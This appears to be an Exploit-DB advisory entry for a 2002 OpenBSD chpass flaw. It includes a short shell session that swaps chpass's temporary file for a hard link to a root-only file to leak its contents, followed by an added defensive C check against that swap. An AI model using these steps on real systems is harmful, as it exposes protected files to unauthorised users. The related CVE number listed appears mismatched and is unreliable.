Vendor: OpenBSD
By: SecurityFocus
CVSS: 7.2 (HIGH)
CWE: 264
Product Name: OpenBSD
Affected Version From: OpenBSD 2.6
Affected Version To: OpenBSD 3.2
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: o:openbsd:openbsd
Platforms Tested: OpenBSD
2002

chpass Local File Access

A vulnerability in chpass, a program included with OpenBSD, allows local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs, which are hard links to the chpass binary. An attacker can create a symbolic link to a file containing sensitive information, and then use chpass to view the contents of the file.

Mitigation:

OpenBSD has released patches to address this vulnerability.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6748/info

It has been reported that a problem with chpass included with OpenBSD may allow local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs, which are hard links to the chpass binary.

# echo "shell: secret_data" >/tmp/sec
# chmod 600 /tmp/sec
$ chpass # ^Z in the editor
[1]+ Stopped chpass
$ rm /var/tmp/pw.Loi22925
$ ln /tmp/sec /var/tmp/pw.Loi22925
$ fg # then quit the editor
chpass
chpass: secret_data: non-standard shell
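
In the session above, the temporary file is removed while the editor is suspended and a hard link to a root-only file is put in its place, so chpass reads that file back and echoes a line of it in its error message. The following C code is an added example, not OpenBSD's patch and not code from the original advisory: a hypothetical helper, open_edited_tmpfile(), re-opens the edited file and refuses it unless it is a regular file, owned by the invoking user, with a link count of one. The paths used in main() are constructed for the demonstration.

```c
/* Added example, not OpenBSD's patch; open_edited_tmpfile() is hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Re-open the temp file after the editor exits. Returns a read-only fd, or
 * -1 if the path no longer looks like the file handed to the editor. Checks
 * use fstat() on the open fd, so the path cannot be swapped in between. */
int open_edited_tmpfile(const char *path, uid_t invoker)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);

    if (fd == -1)
        return -1;                  /* missing, or a symbolic link */
    if (fstat(fd, &st) == -1 ||
        !S_ISREG(st.st_mode) ||     /* FIFO, device, directory */
        st.st_uid != invoker ||     /* file belongs to someone else */
        st.st_nlink != 1) {         /* hard link, as in the session above */
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    char dir[] = "/tmp/chpass-demo.XXXXXX";   /* constructed sample paths */
    char tmp[64], other[64];
    int fd;

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(tmp, sizeof tmp, "%s/pw.tmp", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    if ((fd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0600)) == -1)
        return 1;
    close(fd);
    fd = open_edited_tmpfile(tmp, getuid());
    printf("untouched file: %s\n", fd >= 0 ? "accepted" : "rejected");
    if (fd >= 0)
        close(fd);
    if (link(tmp, other) == 0 && (fd = open_edited_tmpfile(tmp, getuid())) < 0)
        printf("hard-linked file: rejected\n");
    unlink(other); unlink(tmp); rmdir(dir);
    return 0;
}
```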